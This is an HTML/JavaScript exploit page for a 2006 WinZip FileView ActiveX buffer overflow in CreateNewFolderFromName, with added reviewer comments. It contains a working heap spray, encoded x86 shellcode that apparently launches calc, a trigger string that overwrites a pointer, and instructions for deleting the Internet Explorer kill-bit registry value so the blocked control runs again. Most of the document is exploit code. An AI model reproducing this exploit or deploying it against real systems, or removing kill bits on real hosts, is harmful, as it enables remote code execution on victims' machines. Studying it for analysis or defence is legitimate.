WinZip FileView ActiveX Control CreateNewFolderFromName buffer-overflow exploit
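<!--
  Source: Ph4nt0m.Org (original post was in Chinese; translated here).

  An overflow in the WinZip FileView ActiveX control
  (CLSID {A09AE68F-B14D-43ED-B713-BA413F034904}) was published earlier for a
  different method, and the public exploit for it did not work well. This one
  is in CreateNewFolderFromName(). Because of that earlier bug Microsoft appears
  to have disabled (kill-bitted) the control; to reproduce, delete this value:

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A09AE68F-B14D-43ED-B713-BA413F034904}]
    "Compatibility Flags"=dword:00000400

  Happy New Year!

  Reviewer notes:
  - 0x400 in "Compatibility Flags" is the Internet Explorer kill bit. Removing
    it re-enables, for every web page, a control the vendor deliberately
    blocked. Do this only in an isolated, disposable VM, never on a real host.
  - This listing was recovered from a rendered HTML copy in which backslashes
    had been stripped from the "\x0d\x0d\x0d\x0d" tail and from the registry
    path, the shellcode string had been line-wrapped, and stray
    </body></html> and </script /> tags had crept in. Those are corrected below;
    the exploit logic is otherwise unchanged.
-->
<html>
<head>
<object classid="clsid:{A09AE68F-B14D-43ED-B713-BA413F034904}" id="winzip"></object>
</head>
<body>
<script language="javascript">
/*
---===[ winzip-exploit.html

XiaoHui : 76693223[at]163.com
HomePage: www.nipc.org.cn
(c) 2006 All rights reserved.
note: Because of the prior vuln in the FileView ActiveX Control, Microsoft has
disabled (kill-bitted) this control. To test this vuln, delete the key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A09AE68F-B14D-43ED-B713-BA413F034904}]
"Compatibility Flags"=dword:00000400
Tested on Windows 2000 SP4 (CN) and Windows XP SP2 (CN) with WinZip 10.0 (6667);
other versions untested, good luck~
]===---
*/

// Address the overwritten pointer is steered to. The heap spray below fills
// memory up to this address with NOP sleds, so landing anywhere near it slides
// into the payload. The same 0x0d byte is used for the four-byte tail of the
// trigger string, so the tail decodes to exactly this value.
var heapSprayToAddress = 0x0d0d0d0d;

// x86 shellcode, delivered as UTF-16 code units via unescape(). Not analysed
// in depth here: the last bytes of the buffer are the ASCII string "calc"
// (63 61 6C 63 00), which suggests a WinExec("calc")-style payload --
// confirm by disassembling before reusing it anywhere.
var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

// Size of one sprayed block (sled + one copy of the payload): 4 MB.
var heapBlockSize = 0x400000;

// unescape("%uXXXX") produces one 16-bit code unit per escape, so the byte
// length of the payload is twice its string length.
var payLoadSize = payLoadCode.length * 2;

// Sled bytes per block. The 0x38 is presumably headroom for the string's
// heap/BSTR header so the whole block fits one heapBlockSize allocation; the
// original does not document it -- treat as an empirical constant.
var spraySlideSize = heapBlockSize - (payLoadSize + 0x38);

// NOP sled (0x90 0x90 ...), grown to spraySlideSize bytes.
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide, spraySlideSize);

// Number of 4 MB blocks needed to reach heapSprayToAddress: about 50, i.e.
// roughly 200 MB of heap. (The original wrote the literal 0x400000 here; it
// is the same value as heapBlockSize.)
var heapBlocks = (heapSprayToAddress - heapBlockSize) / heapBlockSize;

// Keep every block referenced so the garbage collector does not free them.
var memory = new Array();
for (var i = 0; i < heapBlocks; i++) {
    memory[i] = spraySlide + payLoadCode;
}

// Trigger: 231 filler characters followed by four 0x0d characters. The 231
// offset is specific to the WinZip 10.0 (6667) build named above; the four
// 0x0d bytes are what lands on the overwritten pointer (the original does not
// say whether that is a return address or something else).
// NOTE: the rendered copy had lost the backslashes ("x0dx0dx0dx0d"), which
// would append twelve ASCII characters instead of four 0x0d bytes.
var xh = 'A';
while (xh.length < 231) xh += 'A';
xh += "\x0d\x0d\x0d\x0d";
winzip.CreateNewFolderFromName(xh);

// Doubles the sled until it covers at least spraySlideSize bytes, then trims
// it to exactly spraySlideSize / 2 code units (= spraySlideSize bytes).
function getSpraySlide(spraySlide, spraySlideSize) {
    while (spraySlide.length * 2 < spraySlideSize) {
        spraySlide += spraySlide;
    }
    spraySlide = spraySlide.substring(0, spraySlideSize / 2);
    return spraySlide;
}
</script>
</body>
</html>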